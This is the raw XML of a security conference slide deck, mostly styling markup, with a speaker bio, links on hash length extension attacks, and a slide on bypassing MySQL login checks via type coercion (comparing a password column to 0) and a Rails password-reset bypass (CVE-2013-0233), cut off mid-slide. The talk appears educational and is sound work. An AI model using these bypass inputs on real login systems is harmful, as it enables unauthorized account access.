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Light"/>
          <a:ea typeface="Helvetica Neue Light"/>
          <a:cs typeface="Helvetica Neue Light"/>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D"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="E6EB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Light"/>
          <a:ea typeface="Helvetica Neue Light"/>
          <a:cs typeface="Helvetica Neue Light"/>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Light"/>
          <a:ea typeface="Helvetica Neue Light"/>
          <a:cs typeface="Helvetica Neue Light"/>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BC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3E6FF"/>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BC00FF"/>
        </a:fontRef>
        <a:srgbClr val="BC00FF"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:srgbClr val="BC00FF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="BC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BC00FF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="BC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Light"/>
          <a:ea typeface="Helvetica Neue Light"/>
          <a:cs typeface="Helvetica Neue Light"/>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CAFF"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="F3E6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firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{2708684C-4D16-4618-839F-0558EEFCDFE6}" styleName="">
    <a:tblBg/>
    <a:wholeTbl>
      <a:tcTxStyle b="off" i="off">
        <a:font>
          <a:latin typeface="Helvetica Neue Light"/>
          <a:ea typeface="Helvetica Neue Light"/>
          <a:cs typeface="Helvetica Neue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850900" y="1270000"/>
            <a:ext cx="11303000" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>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2"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mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="740833" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr i="1" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="73BFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="36285" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="48000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1185333" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr i="1" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="73BFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="36285" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="48000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1629833" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr i="1" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="73BFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="36285" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="48000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2074333" indent="-296333" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr i="1" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="73BFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="36285" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="48000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>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3" name="“Type a quote here.”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4267200"/>
            <a:ext cx="10464800" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="54428" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="48000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94"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1" name="143070724_2880x2159.jpe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825500" y="914400"/>
            <a:ext cx="11341100" cy="5740400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="6807200"/>
            <a:ext cx="11430000" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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29" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="3657600"/>
            <a:ext cx="11430000" cy="2438400"/>
          </a:xfrm>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7" name="143070716_1012x1350.jpeg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200900" y="1257300"/>
            <a:ext cx="5016500" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="1384300"/>
            <a:ext cx="5638800" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>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7" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="254000"/>
            <a:ext cx="11430000" cy="2438400"/>
          </a:xfrm>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5" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="254000"/>
            <a:ext cx="11430000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56"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4" name="143070716_1012x1350.jpeg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2755900"/>
            <a:ext cx="5016500" cy="5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="254000"/>
            <a:ext cx="11430000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>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4"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2" name="143070718_1000x750.jpeg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="5105400"/>
            <a:ext cx="5321300" cy="3381384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="143070724_2880x2159.jpeg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1270000"/>
            <a:ext cx="5316293" cy="3378200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="143070716_1012x1350.jpeg"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1244600"/>
            <a:ext cx="5219700" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12534900" y="9311678"/>
            <a:ext cx="312015" cy="312344"/>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2536221" y="9311678"/>
            <a:ext cx="312015" cy="312344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr b="1" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-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lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1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1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6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6pPr>
      <a:lvl7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7pPr>
      <a:lvl8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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="0" algn="r" defTabSz="5842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g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g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Avalanche_effect" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Merkle%E2%80%93Damg%C3%A5rd_construction" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SHA-3"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Length_extension_attack" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/iagox86/hash_extender"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oogle.com"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ory Marsh…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cory Marsh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>cory@bitslip6.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Programming since ’91 web programming since ’97…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="2781300"/>
            <a:ext cx="11430000" cy="5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="525779">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="34289" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Programming since ’91 web programming since ’97</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="525779">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="34289" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Java, C#, C/C++, JavaScript, PHP, Python, Perl, GoLang, x86 ASM and AVR ASM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="525779">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="34289" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Specialize in Web Application Firewall filtering and WAF bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="525779">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="34289" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Blue Team for Idaho Power, Albertsons, ClearWater Analytics, bodybuilding.com, Sheets (Intuit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="525779">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="34289" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Red Team for CanAudit, Sentient Secure, BitSlip6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Using type coercion to bypass Access Controls in MySQL"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465665" y="254000"/>
            <a:ext cx="12073470" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="408940">
              <a:defRPr b="1" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="26669" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Using type coercion to bypass Access Controls in MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Login Bypass:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499533" y="2446865"/>
            <a:ext cx="12005734" cy="6075035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="404040"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="000000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="293369" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Login Bypass: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="586739" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="D4D6DC"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SELECT * FROM user WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:t> = ‘admin’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acbd18db4cc2f85cedef654fccc4a4d8</a:t>
            </a:r>
            <a:r>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="586739" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="BEBFC2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SELECT * FROM user WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:t> = ‘admin’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293369" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Password Reset Bypass: rails CVE-2013-0233</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="586739" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="C6C4C7"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SELECT * FROM password_reset WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
